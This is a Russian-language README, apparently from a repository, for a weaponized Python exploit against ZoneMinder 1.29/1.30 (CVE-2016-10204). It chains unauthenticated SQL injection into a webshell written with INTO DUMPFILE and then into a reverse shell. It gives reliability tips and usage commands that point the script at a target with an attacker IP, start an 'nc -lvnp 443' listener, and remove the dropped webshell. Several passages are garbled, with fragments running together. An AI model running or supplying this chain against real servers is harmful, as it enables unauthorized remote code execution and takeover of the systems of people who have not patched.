
Неаутентифицированная SQL-инъекция с переходом к RCE для ZoneMinder 1.29/1.30 (CVE-2016-10204, EDB-41239). PoC на Python: от SQLi одной командой до веб-шелла и обратного шелла.
Готовый к запуску Python-эксплойт для ZoneMinder 1.29/1.30, который объединяет неаутентифицированную SQL-инъекцию (CVE-2016-10204, EDB-41239) вплоть до интерактивного обратного шелла.
Это вооружённый/автоматизированный PoC для известной, уже исправленной CVE, а не новый эксплойт.
EDB PoC для этой уязвимости останавливается на SQLi-пейлоаде или совете «натравить на это sqlmap». Этот эксплойт упаковывает всю цепочку SQLi → вебшелл → шелл в один читаемый скрипт.
SLEEP) пробы на POST-параметре limit
в index.php?view=request&request=log&task=query.SELECT ... INTO DUMPFILE,
перебирая несколько распространённых путей ZoneMinder/Apache.bash-шелл на ваш
netcat-листенер.DUMPFILE, а не OUTFILE. OUTFILE экранирует переводы строк и портит
многострочный PHP; DUMPFILE записывает сырые байты, поэтому вебшелл остаётся валидным.# pop a shell
python3 zm-exploit.py -u http://TARGET/zm/ -l YOUR_IP -p 443
# start your listener when prompted, in another terminal
sudo nc -lvnp 443
# afterwards, remove the webshell it dropped (name is printed at the end)
python3 zm-exploit.py -u http://TARGET/zm/ --cleanup a1b2c3d4.php
MIT, см. LICENSE.